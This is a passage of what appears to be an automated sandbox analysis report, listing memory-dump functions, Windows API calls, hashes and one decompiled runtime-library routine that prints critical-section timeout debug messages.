                                                                                        • String ID:
                                                                                        • API String ID: 3899507212-0
                                                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                        • Instruction ID: dc487ba2fedb629c5b9432688df7fc5ae78b37cce58c5080e283e58c4be7c241
                                                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                        • Instruction Fuzzy Hash: D4E01AB52102086BDB10DF49CC84EE737ADAF88650F018154BA085B241C930E9118BF5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0321A200, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(03214506,?,03214C7F,03214C7F,?,03214506,?,?,?,?,?,00000000,00000000,?), ref: 0321A22D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                        • Instruction ID: da25ef9f47c5ed80becb78aab22bfc9068db03e569ae6bef1e33cc36dac892d1
                                                                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                        • Instruction Fuzzy Hash: 89E046B5220308ABDB14EF99CC40EA777ADEF88660F118558FE085B241C630F911CBF0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0320F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00008003,?,03208CF4,?), ref: 0320F6CB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
                                                                                        • Instruction ID: fcdda9779b3c1febfe221a741d0460a229c3eb2ed32007c3711c87534078d4cf
                                                                                        • Opcode Fuzzy Hash: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
                                                                                        • Instruction Fuzzy Hash: 44D0A7757A03043BE720FAA59C03F2673CD5B54B00F490074FA4CDB3C3D950E00041A5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0366967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.474241766.0000000003600000.00000040.00000001.sdmp, Offset: 03600000, based on PE: true
                                                                                        • Associated: 00000005.00000002.474705213.000000000371B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000005.00000002.474720424.000000000371F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 980335b7197cb18b62d360575a317619cd81451e26fa56feb6696c71839674cb
                                                                                        • Instruction ID: 6fecd91cf0382e0744ab00815b7b1f2292c3d33a6aca10456f080aac8a5815d1
                                                                                        • Opcode Fuzzy Hash: 980335b7197cb18b62d360575a317619cd81451e26fa56feb6696c71839674cb
                                                                                        • Instruction Fuzzy Hash: B4B09B719015C5D5F615D76047087177A447BD1741F56C451D1024651A4778C091F5B5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Function 036BFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 53%
                                                                                        			E036BFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0366CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E036B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E036B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                        0x036bfdda
                                                                                        0x036bfde2
                                                                                        0x036bfde5
                                                                                        0x036bfdec
                                                                                        0x036bfdfa
                                                                                        0x036bfdff
                                                                                        0x036bfe0a
                                                                                        0x036bfe0f
                                                                                        0x036bfe17
                                                                                        0x036bfe1e
                                                                                        0x036bfe19
                                                                                        0x036bfe19
                                                                                        0x036bfe19
                                                                                        0x036bfe20
                                                                                        0x036bfe21
                                                                                        0x036bfe22
                                                                                        0x036bfe25
                                                                                        0x036bfe40

                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 036BFDFA
                                                                                        Strings
                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036BFE2B
                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036BFE01
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.474241766.0000000003600000.00000040.00000001.sdmp, Offset: 03600000, based on PE: true
                                                                                        • Associated: 00000005.00000002.474705213.000000000371B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000005.00000002.474720424.000000000371F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                        • API String ID: 885266447-3903918235
                                                                                        • Opcode ID: b2711ff37876ee1fb7486c01ee269f271b157192714073a11312e0658c9b406a
                                                                                        • Instruction ID: df2f9d24977b41281c33b2178ce1afaf9c8291af4acf98a2e93d27828d35ba57
                                                                                        • Opcode Fuzzy Hash: b2711ff37876ee1fb7486c01ee269f271b157192714073a11312e0658c9b406a
                                                                                        • Instruction Fuzzy Hash: 68F0C276200601BFD6219A45DC06EA7BB6AEB45730F180218F6285A1E1DA63B8708BE4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%